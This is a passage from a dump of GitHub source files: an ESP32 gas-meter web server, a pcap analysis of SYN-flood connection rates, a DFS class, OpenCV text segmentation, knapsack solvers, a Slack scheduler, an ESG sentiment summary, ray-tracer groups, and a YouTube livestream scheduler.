OK\nContent-Type: text/html\nContent-Length: 34\nConnection: close\n\nDo reset ?\n\"\"\"\n # Connection: close\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # time.sleep(2) # no sleep here ;)\n #####\n #####\n elif request == \"/resetdo\":\n header = \"\"\"HTTP/1.1 302 Found\nContent-Length: 0\nLocation: /\nConnection: close\n\n\"\"\"\n # Connection: close\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # time.sleep(2) # no sleep here ;)\n await asyncio.sleep(0.2) # was 0.3, 0.1 was not good\n #machine.reset()\n freset()\n # time.sleep(1)\n #####\n #####\n else:\n # Server-Timing: text;dur=\"\"\" + str(time.ticks_ms() - timer2) + \"\"\", req;dur=\"\"\" + str(timer2 - timer1) + \"\"\"\n header = \"\"\"HTTP/1.0 404 Not Found\nContent-Type: text/plain\nContent-Length: 23\nConnection: close\n\n404 No page like this.\n\"\"\"\n # conn.sendall(header)\n await writer.awrite(header + \"\\r\\n\")\n # await writer.awrite(vwebpage)\n # conn.close()\n # END IF\n # conn.close() # close or not ?\n # whatever\n try:\n await writer.awrite(vwebpage)\n await writer.drain()\n except Exception as e:\n print('- page flood 2', e)\n # drain and sleep needed for good transfer\n vwebpage = b''\n resp = b''\n # was 0.2, 0.1 is not good\n await asyncio.sleep(0.2)\n # waiting until everything is sent, to close\n await reader.wait_closed()\n # await reader.aclose()\n gc.collect()\n #print(\"-- f serving page done\")\n try:\n # if run as thread, then stop thread\n if not CONFIG2['loop']:\n _thread.exit()\n return\n #pass\n except Exception as e:\n # if this fails, there is no reason to panic, function not in thread\n #ferror_log(\"loop_web thread closed\")\n print('- loop_web close thread:', e)\n # break\n # catch OSError: [Errno 104] ECONNRESET ?\n\n#-###\n#-###\n#-###\n\ndef loop_ntp() -> None:\n global vwebpage\n while CONFIG2['loop']:\n try:\n # get ntp\n ntptime.settime()\n # generate page every loop\n #vwebpage = fwebpage()\n except:\n pass\n # time.sleep(60*60*4) # 4 hours\n #time.sleep(60 * 60) # 1 hours\n\ndef fstart_server() -> None:\n async_loop = asyncio.get_event_loop()\n vserver = asyncio.start_server(loop_web, \"0.0.0.0\", 80)\n async_loop.create_task(vserver)\n async_loop.run_forever()\n return\n\n#-###\n#-### END OF DEFINITIONS\n#-### REAL CODE HERE\n\n#-### define global variables\ntime.sleep(0.2)\ntry:\n ntptime.settime()\nexcept:\n pass\ntime.sleep(0.2)\n\n#VGLOB = {} # defined earlier\n# define time here\n# calculate time offset from the measurement start, should be at midnight\n#VGLOB['offset_time'] = int(time.mktime(OFFSET['date']))\nVGLOB['offset_time'] = int(time.mktime(OFFSET['date']))\n#print(OFFSET['time'])\n# boot time, this stays\nVGLOB['boot'] = now()\n# last update timer, this will change with every update\nVGLOB['update'] = now()\n\n# -### begin, defining inputs and creating/loading files\n# -### readout input value now and define global variable\n#inpvv = inps[21].value()\n# -### creating tables\n# hourly count\ncountsn_h = bytearray()\n# daily count, could be bytearray, but consumption might be higher than 256 daily\ncountsn_d = []\n# just float, showing current counter state\n#countsn = OFFSET['value']\nVGLOB['counter'] = OFFSET['value']\n# possible to add monthly/yearly consumption\n# start settings\n\nERRORLOG = []\n#-### preparation after clean boot\n\n#-###\n#-###\n#-### reading data\ntry:\n VGLOB['temp'] = ( OFFSET['extremes'][1] + OFFSET['extremes'][0] ) / 2\n #VGLOB['extremes'] = OFFSET['extremes']\n if fread_single() > VGLOB['temp']:\n VGLOB['limit'] = [ 1 , OFFSET['extremes'][1] ]\n else:\n VGLOB['limit'] = [ 0 , OFFSET['extremes'][0] ] \nexcept:\n VGLOB['temp'] = fread_single()\n OFFSET['extremes'] = [ VGLOB['temp']-10, VGLOB['temp']+10 ]\n VGLOB['limit'] = [ 0 , fread_single() ]\n#\n\ntime.sleep(0.2)\ntry:\n # try to load\n aa = open('countsn_h.bin', 'rb')\n countsn_h = bytearray(aa.read())\n aa.close()\n # recalculate temporary tables\n # daily\n diffd = int(int(time.time() - VGLOB['offset_time']) / (24 * 3600)) + 1\n # recalculate daily consumption\n # presumes offset at midnight\n countsn_d = []\n for kkk in range(len(countsn_h)):\n if (kkk) >= (len(countsn_d) * 24):\n countsn_d.append(0)\n countsn_d[-1] += countsn_h[kkk]\n # recalculate counter\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + (sum(countsn_h) * OFFSET['res'])\n # monthly/weekly ?\n print('+++ load succesful')\n del aa\n del kkk\nexcept Exception as e:\n # if new start, create file\n countsn_h = bytearray([0])\n countsn_d = [0] # maybe will be created automatically...\n #\n #fsave_count()\n #\n print('except: ', e)\n print('--- new file created')\n#gc.collect()\ntime.sleep(0.2)\n\n#-###\n#-###\n#-### mqtt callback\n# placeholder for mqtt functionality\n# probably unidirectional\n# mqtts.set_callback( cb_mqtt )\n# mqtts.connect()\n# mqtts.subscribe( \"/aaaa/aaaa\" )\n\n#-###\n#-###\n#-### input interrupts\n#inps[21].irq(trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=fcb_btn)\n# inps[22].irq( trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=cb_btn )\n# inps[23].irq( trigger=Pin.IRQ_RISING | Pin.IRQ_FALLING, handler=cb_btn )\n#-###\n# was 2, is 1.5, one full rotation can take as short as 10 seconds\n# v17_01 - 3 sec should be good enough\ntimer_check.init( period = round( 3 * 1000 ), callback=finput_read)\n#\ntime.sleep(0.2)\n#\n#-###\n#-###\n#-### starting threads\n#loopwebthread = _thread.start_new_thread(loop_web, ())\n#loopntpthread = _thread.start_new_thread(loop_ntp, ())\n#\n_thread.start_new_thread(fstart_server, ())\n#\n#time.sleep(0.2)\n#\n\n#fcb_btn()\n#time.sleep(1)\n\n#wdt = machine.WDT( timeout = int( VGLOB['delaycheck'] * 3 ) * 1000 )\n\ngc.collect()\n\n#-### end\n","repo_name":"yunnanpl/esp32_python_gasmeter","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33474,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"98"} +{"seq_id":"31939378713","text":"#!/usr/bin/env python\nimport logging\nimport dpkt\nimport time\nimport operator\nimport numpy as np\nfrom utils.utils import logger_set_log_level\nfrom connection import fill_connections\n\n# keep a logger for debugging and info\nlogger = logging.getLogger(__name__)\n\n\ndef compute_all_rates(pcap_file, interval_s, target_ips, verbose=0, timing=None):\n \"\"\"\n Compute all of the rates for all the attack nodes received over time by\n the server.\n\n @pcap_file: The name of the pcap files containing all packets\n @interval_s: The sampling interval\n @target_ips: The ip addresses of the attack nodes\n @verbose: verbosity level, 0 for all off, 1 for statistics, 2 for everything\n @timing: a dictionary generated by fill_connections prior to calling this routine.\n If it is None, the dictionary is generated locally.\n\n @returns two dictionaries, one for the number of SYN packets sent\n and another containing the number of connections established.\n\n \"\"\"\n\n # check what level of warnings we should use\n current_log_level = logger.getEffectiveLevel()\n if verbose: logger_set_log_level(logger, logging.DEBUG)\n\n if timing is None:\n start_time = time.time()\n f = open(pcap_file)\n rcap = dpkt.pcap.Reader(f)\n timing = fill_connections(rcap, verbose == 2, target_ips)\n end_time = time.time()\n\n logger.debug(\"Time to read pcap file \" + str(end_time - start_time))\n\n start_time = time.time()\n syn_rates = {}\n connection_rates = {}\n\n for host, conn_dict in timing.items():\n num_attempted = 0\n num_acked = 0\n num_failed = 0\n num_synacked = 0\n\n # will have to handle things in two different loops because of the difference in\n # timestamps between the sending of the SYN and the ACK packets\n sending_rate = np.array([0])\n sorted_items = sorted(conn_dict.values(), key=operator.attrgetter('syn_sent'))\n start_ts = 0\n curr_bucket = 0\n for conn in sorted_items:\n syn_sent = conn.syn_sent\n\n if syn_sent == 0:\n continue\n\n # ack has been sent, check which bucket we're counting\n if start_ts == 0:\n start_ts = syn_sent\n\n if (syn_sent - start_ts) > interval_s:\n skipped = int((syn_sent - start_ts)) / interval_s\n if skipped > 1:\n filling = [0] * (skipped - 1)\n sending_rate = np.append(sending_rate, filling)\n curr_bucket += skipped - 1\n\n sending_rate = np.append(sending_rate, 1)\n curr_bucket += 1\n\n start_ts = start_ts + skipped * interval_s\n assert (syn_sent - start_ts < interval_s)\n else:\n sending_rate[curr_bucket] += 1\n\n num_attempted += (1 + np.size(conn.syn_retransmissions))\n\n # now will have to do the establishment rate but do the sorting based on the ack_sent\n # numbers (Actually from the server's end, it should be the ack_received)\n establishment_rate = np.array([0])\n sorted_items = sorted(conn_dict.values(), key=operator.attrgetter('ack_sent'))\n start_ts = 0\n curr_bucket = 0\n for conn in sorted_items:\n ack_sent = conn.ack_sent\n synack_received = conn.synack_received\n\n # check for the ack packets going for the FIN packets\n if conn.syn_sent == 0:\n # this is an FIN packet or an application packet\n continue\n\n # check if the syn ack has been received\n if synack_received > 0:\n num_synacked += 1\n\n # check if the ack has been sent\n if conn.syn_sent > 0 and ack_sent == 0:\n num_failed += 1\n continue\n\n # check if the server dropped this connection\n if conn.IsDroppedByServer():\n num_failed += 1\n\n # count this as a completed connection, it is tricky though that\n # we do not know for sure what happened here, did it reach the\n # established state or did it have to timeout?\n num_acked += 1\n\n # ack has been sent, check which bucket we're counting\n if start_ts == 0:\n start_ts = ack_sent\n\n if (ack_sent - start_ts) > interval_s:\n skipped = int((ack_sent - start_ts)) / interval_s\n if skipped > 1:\n filling = [0] * (skipped - 1)\n establishment_rate = np.append(establishment_rate, filling)\n curr_bucket += skipped - 1\n\n establishment_rate = np.append(establishment_rate, 1)\n curr_bucket += 1\n\n start_ts = start_ts + skipped * interval_s\n assert (ack_sent - start_ts < interval_s)\n else:\n establishment_rate[curr_bucket] += 1\n\n syn_rates[host] = sending_rate\n connection_rates[host] = establishment_rate\n\n attacker_stat_log = \"\"\"\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\n {:38}\\t{}\"\"\".format('Statistics for host:', host,\n 'Total number of attempted connections:', num_attempted,\n 'Total number of acked connections:', num_acked,\n 'Total number of failed connections:', num_failed,\n 'Total number of replies received:', num_synacked,\n 'Average SYN rate seen by server:', np.average(sending_rate) / interval_s,\n 'Average ACK rate seen by server:', np.average(establishment_rate) / interval_s)\n\n # debug because we don't want to do this for every possible ip address\n logger.debug(\"+\" + '-'*50 + \"+\" + attacker_stat_log)\n logger.debug(\"+\" + '-'*50 + \"+\")\n\n end_time = time.time()\n logger.debug(\"Time to perform full analysis \" + str(end_time - start_time))\n\n # reset the logger config\n logger_set_log_level(logger, current_log_level)\n\n return syn_rates, connection_rates\n","repo_name":"nouredd2/puzzles-utils","sub_path":"analysis/parsing/server_analysis.py","file_name":"server_analysis.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"19959880685","text":"class DepthFirstSearch:\n def __init__(self):\n self.graph = {} # Initialize an empty graph\n\n def add_edge(self, source, destination):\n # Add an edge from source to destination\n if source in self.graph:\n self.graph[source].append(destination)\n else:\n self.graph[source] = [destination]\n\n def dfs(self, start_node):\n visited = [] # List to keep track of visited nodes\n stack = [start_node] # Initialize a stack with the start node\n\n while stack:\n node = stack.pop() # Pop the last node from the stack\n if node not in visited:\n visited.append(node) # Mark the node as visited\n\n # Push unvisited neighbors onto the stack\n if node in self.graph:\n for neighbor in self.graph[node]:\n if neighbor not in visited:\n stack.append(neighbor)\n\n return visited\n","repo_name":"tguttzeit/AI-Code-Examination","sub_path":"py_app/src/ChatGPT/DepthFirstSearch/T25/depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"36508050524","text":"import cv2, numpy as np\nimport sys\nimport time\n\n\ndef apply_brightness_contrast(input_img, brightness, contrast):\n\n if brightness != 0:\n if brightness > 0:\n shadow = brightness\n highlight = 255 + brightness\n else:\n shadow = 0\n highlight = 255 + brightness\n alpha_b = (highlight - shadow)/255\n gamma_b = shadow\n\n buf = cv2.addWeighted(input_img, alpha_b, input_img, 0, gamma_b)\n else:\n buf = input_img.copy()\n\n if contrast != 0:\n f = 131*(contrast + 127)/(127*(131-contrast))\n alpha_c = f\n gamma_c = 127*(1-f)\n\n buf = cv2.addWeighted(buf, alpha_c, buf, 0, gamma_c)\n\n return buf\n\ndef WordExtract(orig, dilate, count):\n mult = 1.1 # I wanted to show an area slightly larger than my min rectangle set this to one if you don't\n img_box = orig.copy()\n\n cnts = cv2.findContours(dilate, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\n croppedImages = []\n\n for cnt in cnts:\n area = cv2.contourArea(cnt)\n if area > 60000:\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n W = rect[1][0]\n H = rect[1][1]\n\n Xs = [i[0] for i in box]\n Ys = [i[1] for i in box]\n x1 = min(Xs)\n x2 = max(Xs)\n y1 = min(Ys)\n y2 = max(Ys)\n\n rotated = False\n angle = (rect[2])\n if angle > 90:\n angle = angle + (90-angle)\n rotated = True\n else:\n angle = angle + (0-angle)\n\n if rotated:\n W, H = H, W\n\n center = (int((x1+x2)/2), int((y1+y2)/2))\n size = (int(mult*(x2-x1)),int(mult*(y2-y1)))\n\n M = cv2.getRotationMatrix2D((size[0]/2, size[1]/2), angle, 1.0)\n\n cropped = cv2.getRectSubPix(img_box, size, center)\n cropped = cv2.warpAffine(cropped, M, size)\n\n croppedRotated = cv2.getRectSubPix(cropped, (int(H*mult), int(W*mult)), (size[0]/2, size[1]/2))\n\n cv2.imwrite(f'./output/{str(count)}.png', croppedRotated)\n print(f\"Writing \\t :: \\t'./output/{str(count)}.png'\")\n croppedImages.append(f'./output/{str(count)}.png')\n\n count = count+1\n\n return croppedImages, count\n\n\n\ndef main(path, i):\n print(path)\n # read image\n orig = cv2.imread(path)\n\n # grey scaling\n grey_img = cv2.cvtColor(orig, cv2.COLOR_BGR2GRAY)\n\n # contrasting\n b=50 #brightness_const\n c=120 #contrast_const\n contrast = apply_brightness_contrast(grey_img, b, c)\n\n # global thresholding\n ret, global_thresh = cv2.threshold(contrast, 50, 255, cv2.THRESH_BINARY)\n\n # adaptive thresholding\n adapt_thresh = cv2.adaptiveThreshold(global_thresh, 250, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n\n # denoishing\n denoised = cv2.fastNlMeansDenoising(adapt_thresh, 11, 31, 5) #11, 45, 9 #11, 31, 9 #30,7,25\n\n # Dilate to combine adjacent text contours\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n dilate = cv2.dilate(denoised, kernel, iterations=5)\n\n dilated_blur = cv2.GaussianBlur(dilate, (21, 21), 10)\n\n ret, dilated_thresh = cv2.threshold(dilated_blur, 50, 255, cv2.THRESH_BINARY)\n\n dilated_adapted = cv2.adaptiveThreshold(dilated_thresh, 250, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (7, 3))\n dilatedfinal = cv2.dilate(dilated_adapted, kernel, iterations=10)\n # cv2.imshow(\"dilatedfinal\", cv2.resize(dilatedfinal, (1000, 1000)))\n\n output, i = WordExtract(orig, dilatedfinal, i)\n\n cnts = cv2.findContours(dilatedfinal, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n\n\n for cnt in cnts:\n area = cv2.contourArea(cnt)\n if area > 50000:\n x, y, w, h = cv2.boundingRect(cnt)\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n orig = cv2.drawContours(orig,[box],0,(0,0,255), 10)\n cv2.rectangle(orig, (x, y),(x + w, y + h), (36, 255, 12), 10)\n\n # cv2.imshow(\"Testing red\", cv2.resize(checking, (1000, 1000)))\n # cv2.imshow(\"Testing\", cv2.resize(orig, (1000, 1000)))\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n if len(output) < 1:\n return None\n else:\n return output, i\n\nif __name__ == '__main__':\n # read image\n main(sys.argv[1])\n","repo_name":"AIGamer28100/Design-Project-II","sub_path":"src/textSegmentaion.py","file_name":"textSegmentaion.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72409455041","text":"import queue\n\n# [문제1] 분기한정 가지치기 너비우선검색\nclass Node:\n def __init__(self, level, weight, profit, include):\n self.level = level\n self.weight = weight\n self.profit = profit\n self.include = include\n\ndef kp_BFS():\n global maxProfit\n global bestSet\n global secondMaxProfit\n global secondBestSet\n global nodeCount\n global maxQueue\n\n queueCount = 0\n q = queue.Queue()\n\n v = Node(-1, 0, 0, n * [0])\n q.put(v)\n\n maxQueue += 1\n queueCount += 1\n nodeCount += 1\n\n while (not q.empty()):\n v = q.get()\n u = Node(-1, 0, 0, n * [0])\n\n queueCount -= 1\n nodeCount += 2\n \n u.level = v.level + 1\n u.weight = v.weight + w[u.level]\n u.profit = v.profit + p[u.level]\n u.include = v.include\n u.include[u.level] = 1\n if (u.weight <= W) and (u.profit > maxProfit):\n maxProfit = u.profit\n bestSet = u.include[:]\n if compBound(u) > maxProfit:\n q.put(u)\n queueCount += 1\n\n u = Node(u.level, v.weight, v.profit, v.include[:])\n u.include[u.level] = 0\n if (u.weight <= W) and (u.profit > secondMaxProfit):\n secondMaxProfit = u.profit\n secondBestSet = u.include[:]\n if compBound(u) > secondMaxProfit:\n q.put(u)\n queueCount += 1\n\n if queueCount > maxQueue:\n maxQueue = queueCount\n\ndef compBound(u):\n if u.weight >= W:\n return 0\n else:\n result = u.profit\n j = u.level + 1\n totweight = u.weight\n\n while (j < n) and (totweight + w[j] <= W):\n totweight += w[j]\n result += p[j]\n j += 1\n k = j\n if k < n:\n result += (W - totweight) * p[k] / w[k]\n return result\n\n\nn = 4\nW = 5\np = [30, 36, 18, 10]\nw = [3, 4, 3, 2]\ninclude = [0] * n\nmaxProfit = 0\nbestSet = n * [0]\nsecondMaxProfit = 0\nsecondBestSet = n * [0]\nnodeCount = 0 # 상태공간트리의 �� 노드의 개수\nmaxQueue = 0 # 어느 한순간에 queue에 저장된 데이터 개수의 최댓값\nkp_BFS()\nprint('[문제1]')\nprint(nodeCount)\nprint(maxQueue)\nprint(bestSet, maxProfit)\nprint(secondBestSet, secondMaxProfit)\nprint()\n\n# [문제2] 분기한정 가지치기 최고우선검색\n\nclass Node2:\n def __init__(self, level, weight, profit, bound, include):\n self.level = level\n self.weight = weight\n self.profit = profit\n self.bound = bound\n self.include = include\n\n def __lt__(self, other):\n return self.bound < other.bound\n\ndef kp_Best_FS():\n global maxProfit2\n global bestSet2\n\n pq = queue.PriorityQueue() # min-heap\n v = Node2(-1, 0, 0, 0, [0] * n)\n v.bound = compBound2(v)\n pq.put(v)\n \n while not pq.empty():\n v = pq.get()\n\n if v.bound < maxProfit2:\n level = v.level + 1\n weight = v.weight + w[level]\n profit = v.profit + p[level]\n include = v.include[:]\n u = Node2(level, weight, profit, 0, include)\n u.include[u.level] = 1\n\n if u.weight <= W and u.profit > maxProfit2:\n maxProfit2 = -u.profit\n bestSet2 = u.include[:]\n\n u.bound = compBound2(u)\n if u.bound < maxProfit2:\n pq.put(u)\n \n u = Node2(v.level + 1, v.weight, v.profit, 0, v.include[:])\n u.bound = compBound2(u)\n if u.bound < maxProfit2:\n u.include[u.level] = 0\n pq.put(u)\n \ndef compBound2(u):\n if u.weight >= W:\n return 0\n else:\n result = u.profit\n j = u.level + 1\n totweight = u.weight\n\n while j < n and totweight + w[j] <= W:\n totweight += w[j]\n result += p[j]\n j += 1\n k = j\n if k < n:\n result += (W - totweight) * p[k] / w[k]\n return -result\n\nn = 4\nW = 5\np = [30, 36, 18, 10]\nw = [3, 4, 3, 2]\ninclude = [0] * n\nmaxProfit2 = 0\nbestSet2 = n * [0]\nkp_Best_FS()\nprint('[문제2]')\nprint(bestSet2, -maxProfit2)","repo_name":"hwangjuntae/code","sub_path":"algorithm/al_solution/hw4/hw4+김성우+2021105684.py","file_name":"hw4+김성우+2021105684.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"15737882580","text":"from sched import scheduler\nfrom random import randint\nimport datetime\n\n\ndays_of_week = ['lunes', 'martes', 'miércoles', 'jueves',\n 'viernes', 'sábado', 'domingo']\ngreetings = ['¡Buenos días!', '¡Que tengáis un fantástico día!',\n 'Good morning', 'Que paseis un buen {}', 'Buen {}', 'Buenos días por la mañana']\n\n@scheduler.scheduled_job('cron', day_of_week='mon-fri', hour=8)\ndef morning(**kwargs):\n msg = greetings[randint(0, len(greetings)-1)]\n day = days_of_week[datetime.datetime.today().weekday()]\n msg = msg.format(day)\n\n client = kwargs['client']\n client.rtm_send_message(\"qa_group\", msg)\n","repo_name":"ChemitaContigo/qasimodo","sub_path":"src/sched/morning.py","file_name":"morning.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72844983683","text":"import pandas as pd\r\n\r\n\r\ndef get_sentiment_label(row):\r\n labels = {\r\n 'negative': row.negative_score,\r\n 'neutral': row.neutral_score,\r\n 'positive': row.positive_score\r\n }\r\n\r\n return max(labels, key=labels.get)\r\n\r\n\r\ndef summarize_sentiment(esg_component):\r\n df1 = pd.read_csv(f'sentiment_{esg_components}_guardian_df(1).csv', sep=';', index_col=0)\r\n df2 = pd.read_csv(f'sentiment_{esg_components}_df.csv', sep=';', index_col=0)\r\n\r\n df1 = df1[['companyName', 'versionCreated', 'negative_score', 'neutral_score', 'positive_score']]\r\n df2 = df2[['companyCode', 'versionCreated', 'negative_score', 'neutral_score', 'positive_score']]\r\n\r\n df1.columns = df2.columns\r\n df = pd.concat([df1, df2], ignore_index=True)\r\n\r\n df.columns = ['company', 'date', 'negative_score', 'neutral_score', 'positive_score']\r\n\r\n df['year'] = df['date'].apply(lambda date_str: date_str.split('-')[0])\r\n df['month'] = df['date'].apply(lambda date_str: date_str.split('-')[1])\r\n df = df[df['year'].isin(['2020', '2021'])]\r\n df['period'] = df.apply(lambda row: f'{row.year}-{row.month}', axis=1)\r\n\r\n df['label'] = df.apply(get_sentiment_label, axis=1)\r\n\r\n grouping_df = df[['company', 'period', 'label']].value_counts()\r\n grouping_df = grouping_df.unstack(2)\r\n\r\n grouping_df = grouping_df.fillna(0)\r\n grouping_df['pos_perc'] = grouping_df.apply(lambda row: row.positive / sum(row), axis=1)\r\n grouping_df['neg_perc'] = grouping_df.apply(lambda row: row.negative / sum(row), axis=1)\r\n\r\n grouping_df.to_excel(f'news_sentiment_{esg_components}.xlsx')\r\n\r\n\r\nesg_components = ['ceo', 'gov', 'cyb', 'env']\r\n\r\nfor esg_component in esg_components:\r\n summarize_sentiment(esg_components)\r\n","repo_name":"adrian-stepniak/ai-in-esg-competition","sub_path":"sentiment_summary.py","file_name":"sentiment_summary.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72531417281","text":"from .shape import Shape\nfrom .bounding_box import BoundingBox\nfrom .intersections import Intersections\n\nclass Group (Shape):\n __slots__ = ['shapes']\n \n def __init__(self, *args):\n super().__init__()\n self.shapes = list(args)\n for shape in self.shapes:\n shape.parent = self\n \n def intersects_int(self, r):\n if self.bounds().intersects(r):\n hits = []\n for shape in self.shapes:\n xs = shape.intersects(r)\n for i in xs:\n if not i in hits:\n hits.append(i)\n \n return Intersections(*sorted(hits, key=lambda x: x.t))\n return Intersections()\n \n def local_normal_at(self, pt, i):\n raise NotImplementedError\n \n def __len__(self):\n return len(self.shapes)\n \n def bounds(self):\n box = BoundingBox()\n for shape in self.shapes:\n box.add(shape.parent_space_bounds())\n return box\n\n def add(self, s):\n self.shapes.append(s)\n s.parent = self\n\n def contains(self, s):\n return s in self\n \n def __contains__ (self, s):\n return s in self.shapes\n \n def __getitem__ (self, idx):\n return self.shapes[idx]\n\n def partition_children(self):\n left_list = []\n right_list = []\n \n to_remove = []\n \n left, right = self.bounds().split()\n for shape in self.shapes:\n shape_parent_bounds = shape.parent_space_bounds()\n if left.contains(shape_parent_bounds):\n left_list.append(shape)\n to_remove.append(shape)\n if right.contains(shape_parent_bounds):\n right_list.append(shape)\n to_remove.append(shape)\n \n for s in to_remove:\n self.shapes.remove(s)\n\n return left_list, right_list\n \n def make_subgroup (self, *args):\n self.add(Group(*args))\n\n def divide(self, threshold):\n if threshold <= len(self):\n left, right = self.partition_children()\n if len(left):\n self.make_subgroup(*left)\n if len(right):\n self.make_subgroup(*right)\n \n for s in self.shapes:\n if hasattr(s, 'divide'):\n s.divide(threshold)\n\n def __eq__ (self, other):\n return isinstance(other, Group) and \\\n _compare_shapes(self.shapes, other.shapes) and \\\n len(self) == len(other)\n \n def __repr__(self):\n return f\"Group({self.shapes})\"\n \n\n def check_hits(self):\n for s in self.shapes:\n s.check_hits()\n\n\ndef _compare_shapes (first, second):\n first_not_second = list(filter(lambda x: x not in first, second))\n second_not_first = list(filter(lambda x: x not in second, first))\n return not bool (first_not_second or second_not_first)\n\n\ndef _hexagon_corner():\n sphere = Sphere()\n sphere = t.ransform = translation(0, 0, -1) * scaling(0.25, 0.25, 0.25)\n \ndef _hexagon_Edge():\n cylinder = Cylinder()\n cylinder.minimum = 0\n cylinder.maximum = 1\n cylinder.transform = translation(0, 0, -1) * \\\n rotation_y(-Math.PI / 6) * \\\n rotation_z(-Math.PI / 2) * \\\n scaling(0.25, 1, 0.25)\n\ndef _hexagon_side():\n side = Group()\n side.add(_hexagon_corner())\n side.add(_hexagon_edge())\n return side\n \ndef hexagon():\n hex = Group()\n for i in range(6):\n side = _hexagon_side()\n side.transform = rotation_y(i * math.pi / 3)\n hex.add(side)\n return hex;","repo_name":"davepkennedy/ray_tracer_challenge_python","sub_path":"rt/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"17571924575","text":"import datetime\r\nimport math\r\nimport youtube\r\nimport json\r\nimport os\r\nimport httplib2\r\nfrom googleapiclient.errors import HttpError\r\n\r\n# Global variables yay\r\nterm_start_date = \"2020-10-11\"\r\nterm = 4\r\n\r\ndays = {\r\n 0 : \"Monday\",\r\n 1 : \"Tuesday\",\r\n 2 : \"Wednesday\",\r\n 3 : \"Thursday\",\r\n 4 : \"Friday\",\r\n 5 : \"Saturday\",\r\n 6 : \"Sunday\"\r\n}\r\n\r\nclass Lesson():\r\n def __init__(self, term, week, subject, day, classtime, teacher):\r\n self._term = term\r\n self._week = week\r\n self._subject = subject\r\n self._day = day\r\n self._classtime = classtime\r\n self._teacher = teacher\r\n \r\n @property\r\n def classtime(self):\r\n return self._classtime\r\n\r\n def message_string(self):\r\n print_time = self._classtime.strftime(\"%I:%M%p\")\r\n return f'{self._subject} {print_time} {self._teacher}'\r\n\r\n # Function to format livestream name \r\n def __str__(self):\r\n print_time = self._classtime.strftime(\"%I:%M%p\")\r\n output = f'T{self._term} | Week {self._week} | {self._subject} {self._day} {print_time} {self._teacher}'\r\n return output\r\n\r\n# Send message to slack\r\ndef send_message(lesson, stream_key, broadcast_id):\r\n string = lesson.message_string() + \"\\n\" + stream_key + \"\\n \\n\" + \"youtube.com/watch?v=\" + broadcast_id\r\n\r\n url = 'insert url here'\r\n bot_message = {\r\n 'text' : string\r\n }\r\n\r\n message_headers = {'Content-Type': 'application/json; charset=UTF-8'}\r\n\r\n http_obj = httplib2.Http()\r\n response = http_obj.request(\r\n uri=url,\r\n method='POST',\r\n headers=message_headers,\r\n body=json.dumps(bot_message),\r\n )\r\n\r\n print(\"Message sent\\n\")\r\n\r\n\r\n# Youtube authentication yay\r\n#youtube_auth = youtube.get_authenticated_service()\r\n\r\n# Grab the date and figure out what day and week it is\r\nto_day = datetime.date.today()\r\nweek_day = days.get(to_day.weekday())\r\nterm_start = datetime.datetime.strptime(term_start_date, \"%Y-%m-%d\").date()\r\nweek_num = math.ceil((to_day - term_start).days / 7) \r\n\r\n# Format the file name based on the year and term\r\nfilename = str(term_start.year) + \"t\" + str(term) + \".txt\"\r\n\r\n# Search through lesson.txt for lessons that are on and save the information to a class\r\nwith open(filename, \"r\") as f:\r\n for line in f:\r\n if week_day in line: \r\n subject, day, classtime, teacher = line.split(',')\r\n\r\n # Converting the class time to a datetime object \r\n hour, minute = map(int , classtime.split(':'))\r\n classtime = datetime.time(hour, minute, 0)\r\n classtime = datetime.datetime.combine(datetime.date.today(), classtime)\r\n\r\n lesson = Lesson(term, week_num, subject, day, classtime, teacher)\r\n print(lesson)\r\n\r\n # Do the youtube things\r\n try:\r\n broadcast_id = youtube.insert_broadcast(youtube_auth, lesson)\r\n youtube.update_broadcast(broadcast_id, youtube_auth, lesson)\r\n (stream_id, stream_key) = youtube.insert_stream(youtube_auth, lesson)\r\n print(stream_id, stream_key)\r\n youtube.bind_broadcast(youtube_auth, broadcast_id, stream_id)\r\n except HttpError as e:\r\n print (f\"An HTTP error {e.resp.status} occurred:\\n {e.content}\")\r\n \r\n send_message(lesson, stream_key, 